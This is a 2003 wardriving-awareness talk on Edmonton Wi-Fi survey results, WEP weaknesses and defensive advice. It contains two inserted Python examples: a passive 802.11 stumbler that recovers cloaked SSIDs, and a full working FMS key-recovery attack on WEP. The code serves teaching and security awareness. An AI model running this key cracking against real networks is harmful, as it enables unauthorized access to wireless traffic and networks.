CIPS CompSEC SIG

1
CIPS CompSEC SIG
  • Feb 20, 2003
  • Speech by Renderman
  • Render_at_renderlab.net

2
Wardriving Edmonton Results
  • It's not a bug, it's a feature

3
Technology Background
  • 802.11b
  • Spread spectrum
  • 2.4 GHz, licence-free
  • 11 channels, 2.412 to 2.462 GHz
  • 11 Mbps
  • 40/64/128-bit WEP encryption, MAC filtering
  • SSID (logical network name)
  • Cellular nature
  • Wi-Fi Alliance
  • Founded 1999, certifies devices for compliance

4
Technology Background
  • Various features among different models
  • Usually have DHCP server, MAC filtering, WEP
  • Wi-Fi is designed to roam to strongest signal
  • Many different manufacturers and many brands
  • Dlink
  • Linksys
  • Cisco
  • Apple
  • M$ (Microsoft)

5
Which brings us to today...
  • 802.11b is a multi-billion-dollar industry
  • 1.546 billion in 2002
  • Set to rise (or fall, depending on the report)
  • Prices falling dramatically
  • Many laptops/PDAs Wi-Fi enabled from the factory
  • Airports, Airplanes, Cafés, Hotels
  • Very pervasive, very chic, hot technology

6
Enough marketing and history
  • Time for the realities

7
What is Wardriving
  • WarDriving (v.): The benign act of locating and logging wireless
    access points while in motion. - Blackwave
  • A.k.a. network stumbling, lanjacking(?), whacking(?)
  • Using a Wi-Fi enabled device (laptop, PDA) to discover the presence
    of wireless networks.
  • Factory software allows rudimentary stumbling
  • First coined and automated by Pete Shipley of Dis.org
  • Completely LEGAL!
  • Frighteningly effective

8
Wardriving is not a crime
  • Detection is legal (public frequencies)
  • Connecting is illegal
  • Stumbler Ethic
  • Trying to raise security awareness with the Worldwide Wardrive
  • Bad people do bad things; wardrivers are not bad people

9
Edmonton, Alberta as of Feb 2nd 2003, 1689 Access
points
10
Downtown and University Detail
11
Downtown Detail
12
Edmonton Statistics
  • Since March 2002
  • 1689 separate Access points detected
  • 1194 without WEP (not necessarily insecure)
  • 600 on default settings (very insecure)
  • In the strangest of places
  • Hospitals, health facilities, govt, hotels,
    trucking companies, breweries, homes, oil
    companies, schools, cafes.

13
Wireless Intruder Implications
  • Bandwidth theft
  • Spamming, threats, attacks
  • All tracks lead back to you
  • Access to your internal network
  • Untraceable
  • Easy to do, cheap

14
Edmonton Survey Conclusions
  • After 11 months and a lot of miles, no one has
    learned anything
  • No-one is paying attention
  • Wireless is popular even in the frozen north
  • "It can't happen here" attitude
  • Severe lack of understanding
  • There is an interest in learning though

15
Now that I have your attention
  • How is this accomplished?

16
Wardriving made easy
  • Laptop or PDA
  • 802.11b card
  • Special software that supports the card
    (Netstumbler or Kismet)
  • Some form of conveyance (feet, bike, car, etc)
  • Optional
  • External antennas (Pringles can)
  • GPS for generating maps
  • Misc software (realtime tracking, routing)

17
Passive vs Active
  • Netstumbler: active. Sends probe requests and listens for the
    broadcast announcements that come back (about 10 per second)
  • Kismet: passive. Listens for any 802.11b traffic and determines
    network settings from packet capture. Able to detect cloaked APs
    (SSID broadcast turned off)
  • Both free (as in beer)
  • Both useful as site survey tools, used throughout the industry
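To make the passive/active distinction concrete, here is an added example (mine, not code from Kismet, NetStumbler or the presenter) of what a passive stumbler does with a monitor-mode capture: it transmits nothing, classifies raw 802.11 frames, tallies access points by BSSID, reads the Privacy (WEP) capability bit and channel from beacons, notes clear-text data frames, and recovers the SSID of a cloaked AP from the probe response the AP sends to a legitimate client. The frames, MAC addresses and the `DEFAULT_SSIDS` list are constructed for the example; the frame layout (24-byte header, 12 bytes of fixed fields, tagged parameters) is the 802.11 management-frame format.

```python
"""Passive 802.11 discovery of the kind the slide credits to Kismet:
classify raw frames from a monitor-mode capture, tally access points,
and recover a cloaked AP's SSID from the probe response it sends to a
client.  Added example, not Kismet's code; every frame is constructed
inline so it runs offline."""
import struct

# Frame Control: byte 0 = subtype|type, byte 1 = flags.
FC_BEACON, FC_PROBE_RESP, FC_DATA = 0x80, 0x50, 0x08
FLAG_FROM_DS, FLAG_PROTECTED = 0x02, 0x40   # 0x40 is the WEP/Protected bit
CAP_PRIVACY = 0x0010                        # Privacy bit of the capability field
TAG_SSID, TAG_RATES, TAG_DS_PARAM = 0, 1, 3
BROADCAST = b"\xff" * 6
DEFAULT_SSIDS = {"linksys", "default", "tsunami"}   # assumed, illustrative list


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def mgmt_frame(subtype, bssid, ssid, channel, privacy, dst=BROADCAST):
    """Beacon or probe response: 24-byte header, 12 bytes of fixed fields
    (timestamp, interval, capability), tagged parameters.  ssid=b"" cloaks."""
    header = bytes([subtype, 0]) + b"\0\0" + dst + bssid + bssid + b"\0\0"
    fixed = struct.pack("<QHH", 0, 100, CAP_PRIVACY if privacy else 0)
    tags = bytes([TAG_SSID, len(ssid)]) + ssid + bytes([TAG_RATES, 1, 0x82])
    return header + fixed + tags + bytes([TAG_DS_PARAM, 1, channel])


def data_frame(bssid, protected):
    """From-DS data frame; a protected body starts with IV(3) + key id(1)."""
    flags = FLAG_FROM_DS | (FLAG_PROTECTED if protected else 0)
    header = bytes([FC_DATA, flags]) + b"\0\0" + mac("00:11:22:33:44:55") + bssid + bssid + b"\0\0"
    return header + (b"\x01\x02\x03\x00" if protected else b"\xaa\xaa\x03\x00") + bytes(16)


def parse_tags(blob):
    """Tagged parameters are (id, length, value) triples until the body ends."""
    tags, i = {}, 0
    while i + 2 <= len(blob):
        tid, ln = blob[i], blob[i + 1]
        tags[tid] = blob[i + 2:i + 2 + ln]
        i += 2 + ln
    return tags


def survey(frames):
    """Tally APs without transmitting anything.  Beacons and probe responses
    carry the BSSID in addr3, From-DS data frames in addr2."""
    aps = {}
    template = dict(ssid=None, cloaked=False, channel=None, wep=False, data=0, clear=0)
    for f in frames:
        if len(f) < 24:
            continue
        fc0, flags = f[0], f[1]
        if fc0 in (FC_BEACON, FC_PROBE_RESP) and len(f) >= 36:
            ap = aps.setdefault(f[16:22].hex(":"), dict(template))
            cap = struct.unpack("<H", f[34:36])[0]
            tags = parse_tags(f[36:])
            ap["wep"] = bool(cap & CAP_PRIVACY)
            if len(tags.get(TAG_DS_PARAM, b"")) == 1:
                ap["channel"] = tags[TAG_DS_PARAM][0]
            ssid = tags.get(TAG_SSID, b"")
            if fc0 == FC_BEACON and ssid.strip(b"\0") == b"":
                ap["cloaked"] = True             # SSID broadcast turned off
            elif ssid:
                ap["ssid"] = ssid.decode("utf-8", "replace")   # probe responses leak it
        elif fc0 == FC_DATA and flags & FLAG_FROM_DS:
            ap = aps.setdefault(f[10:16].hex(":"), dict(template))
            ap["data"] += 1
            if not flags & FLAG_PROTECTED:
                ap["clear"] += 1                 # payload readable by anyone in range
    return aps


def flags_for(ap):
    """What the survey slides would flag: defaults, no WEP, cloaking, clear data."""
    out = []
    if ap["ssid"] and ap["ssid"].lower() in DEFAULT_SSIDS:
        out.append("default-settings?")
    if not ap["wep"]:
        out.append("no-WEP")
    if ap["cloaked"]:
        out.append("cloaked(SSID recovered)" if ap["ssid"] else "cloaked")
    if ap["clear"]:
        out.append("%d clear-text data frames" % ap["clear"])
    return out


def sample_capture():
    """Constructed capture: a default Linksys, a WEP'd office AP, a cloaked AP."""
    linksys, office, hidden = mac("00:0c:41:aa:bb:cc"), mac("00:40:96:11:22:33"), mac("00:02:2d:77:88:99")
    return [
        mgmt_frame(FC_BEACON, linksys, b"linksys", 6, privacy=False),
        data_frame(linksys, protected=False),
        mgmt_frame(FC_BEACON, office, b"acme-eng", 11, privacy=True),
        data_frame(office, protected=True),
        mgmt_frame(FC_BEACON, hidden, b"", 1, privacy=True),
        # A cloaked AP still answers a client's directed probe with its SSID.
        mgmt_frame(FC_PROBE_RESP, hidden, b"hidden-net", 1, privacy=True, dst=mac("00:11:22:33:44:55")),
    ]


if __name__ == "__main__":
    for bssid, ap in survey(sample_capture()).items():
        print(bssid, "ch%s" % ap["channel"], ap["ssid"], " ".join(flags_for(ap)))
```

An active stumbler instead sends a probe request with a wildcard SSID and logs whoever answers; an AP with SSID broadcast turned off ignores wildcard probes, which is why it stays invisible to NetStumbler but not to a sniffer that sees the AP's reply to a real client.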

18
The RenderVan Wardriving Rig

19
The problems with Wi-Fi
  • No one RTFMs
  • APs left on defaults
  • WEP: unsafe at any key length
  • Inappropriate deployment
  • Rogue APs
  • It's a bloomin' RADIO!

20
RTFM
  • Buried security warnings and instructions
  • No deployment warnings
  • Manufacturers ignoring problem, bad for sales

21
Defaults
  • 36% of APs in Edmonton on default, out-of-the-box settings
  • "It works, don't screw with it" attitude
  • Quick start guides ignore security

22
Demo
  • Default access point

23
Wired Equivalent Privacy (WEP)
  • Uses RC4
  • Export restrictions kept the key at 40 bits (very weak); "64-bit"
    later on (the extra 24 bits are the per-frame IV, sent in the clear)
  • Proprietary extensions for 128-bit, incompatible between
    manufacturers, making for headaches and users ignoring it
  • Static key
  • Found weak in July 2001
  • Fluhrer, Mantin, and Shamir (the S in RSA) published their attack on
    RC4's key scheduling in August 2001, which led to
  • Airsnort: 30 seconds + 2 gig of data = WEP key
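The chain from "RC4 with a static key and a 24-bit IV" to "Airsnort recovers the key" is worth seeing end to end, so here is an added example (mine, not AirSnort's code or anything from the presenter) of WEP encryption and the Fluhrer-Mantin-Shamir attack it enabled. WEP builds the RC4 key as IV||secret, sends the IV in the clear, and every LLC/SNAP data frame begins with the known byte 0xAA, so the first keystream byte is known for every captured frame. FMS showed that for IVs of the form (A+3, 255, X), replaying the first A+3 steps of the RC4 key schedule with the bytes already known lets you compute a guess for secret byte A that is right about 5% of the time, and wrong guesses are spread out, so a vote over a few hundred such frames picks out the right byte. The 40-bit key, the frames and the IV set below are constructed; the attack verifies each candidate key against a frame's CRC-32 ICV and backtracks, so a noisy vote does not derail it.

```python
"""WEP as the slide describes it, and the attack AirSnort automated.
Added example (not AirSnort's code): KEY, the frames and the weak IVs are
constructed inline so the whole thing runs offline."""
import struct
import zlib
from collections import Counter

SNAP_FIRST_BYTE = 0xAA        # known plaintext: LLC/SNAP header 0xAA 0xAA 0x03


def rc4(key, n):
    """RC4: key-scheduling (KSA) then n bytes of keystream (PRGA)."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data):
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext):
    """Frame body = IV(3) || key-id(1) || RC4(IV||key) XOR (plaintext || CRC-32)."""
    ks = rc4(iv + key, len(plaintext) + 4)
    return iv + b"\x00" + bytes(a ^ b for a, b in zip(plaintext + icv(plaintext), ks))


def wep_decrypt(key, body):
    """Return the plaintext, or None if the ICV does not check out."""
    ct = body[4:]
    pt = bytes(a ^ b for a, b in zip(ct, rc4(body[:3] + key, len(ct))))
    return pt[:-4] if icv(pt[:-4]) == pt[-4:] else None


def fms_votes(frames, known):
    """Vote for secret-key byte A = len(known) using weak IVs (A+3, 255, X)."""
    A = len(known)
    votes = Counter()
    for body in frames:
        iv = body[:3]
        if iv[0] != A + 3 or iv[1] != 0xFF:
            continue
        z = body[4] ^ SNAP_FIRST_BYTE           # first keystream byte
        K = list(iv) + list(known)              # key bytes we already know
        S, j = list(range(256)), 0
        for i in range(A + 3):                  # replay the first A+3 KSA steps
            j = (j + S[i] + K[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        i = A + 3
        # "Resolved" condition: if the rest of the KSA leaves S[0], S[1] and
        # S[i] alone (~5% of the time) the first output byte is S[i] after
        # this step, i.e. the old S[j_new], which pins down K[i] = secret[A].
        if S[1] >= i or S[1] + S[S[1]] != i:
            continue
        votes[(S.index(z) - j - S[i]) & 0xFF] += 1
    return votes


def fms_crack(frames, keylen, verify_frame, top=3):
    """Depth-first over the top-voted candidates per byte; a candidate key is
    accepted only if it decrypts verify_frame with a valid ICV."""
    def recover(known):
        if len(known) == keylen:
            key = bytes(known)
            return key if wep_decrypt(key, verify_frame) is not None else None
        for cand, _ in fms_votes(frames, known).most_common(top):
            key = recover(known + [cand])
            if key is not None:
                return key
        return None
    return recover([])


KEY = bytes([0x1F, 0x6B, 0xC3, 0x07, 0x9A])     # constructed 40-bit secret


def capture_weak_iv_frames(key, keylen=5):
    """What a passive sniffer eventually collects: one frame per weak IV.
    Only 5*256 of the 2^24 IVs have this form, hence AirSnort's gigabytes."""
    payload = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"constructed payload"
    return [wep_encrypt(key, bytes([A + 3, 0xFF, X]), payload)
            for A in range(keylen) for X in range(256)]


if __name__ == "__main__":
    frames = capture_weak_iv_frames(KEY)
    print("recovered key:", fms_crack(frames, 5, frames[0]).hex())
```

The example uses only the classic (A+3, 255, X) family; AirSnort and later tools accept any IV that satisfies the resolved condition, and a 104-bit key needs the same procedure carried out over 13 bytes rather than 5. Longer keys do not help: the attack cost grows linearly with key length, which is the point of "unsafe at any key length".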

24
Deployment problems
  • Often behind firewalls and other security devices, on the trusted
    side of the network
  • Should be treated as a wall jack. Would you run Cat5 to the parking
    lot?
  • Current implementation makes security hard to maintain (rotating
    keys, updating MAC filters)
  • Attitudes: "No one would want to break in here", "No one will find
    me", "Security costs too much"

25
Rogue APs
  • Employees being helpful, or creative
  • IT staff unaware, not caring
  • No company policies, or no enforcement
  • No IT auditing / rogue hunting
  • Often on defaults (ID10T errors)
  • Gee-whiz factor for the boss

26
It's a RADIO!!!
  • Broadcasts far beyond walls and property
  • If WEP is not enabled, data is sent in the clear
  • Email, database queries, FTP, messenger
  • Data sent in all directions
  • Long distance detection: <25 miles
  • Long distance connection: <5 miles
  • All Wi-Fi gear is a Tx/Rx (transmitter and receiver)
  • Wi-Fi is cellular in nature, designed to associate with the
    strongest signal (even if it's not yours)

27
Suggestions
  • Set a company policy on wireless and enforce it
  • Use WEP at a minimum (a "Keep out" sign)
  • EAP (Extensible Authentication Protocol), Cisco
  • RADIUS, 802.1x, VPNs
  • Audit the network from the wired side
  • Audit the network from the wireless side
  • Locate APs in front of the firewall, behind a captive portal or
    other authentication (RADIUS, etc.)
  • Hire professionals for installation and advice

28
Sites
  • www.renderlab.net - Edmonton and Alberta wardriving
  • www.dis.org/wl/maps/ - Pete Shipley's original research
  • www.netstumbler.com - Active wardriving software
  • www.kismetwireless.net - Passive wardriving software
  • www.wardrivingisnotacrime.com - Fashions by Blackwave
  • www.worldwidewardrive.org - We have our own event
  • www.wardriving.com - General resource
  • forums.netstumbler.com - My hangout, great info and people

29
Q & A
  • Questions, comments, and accusations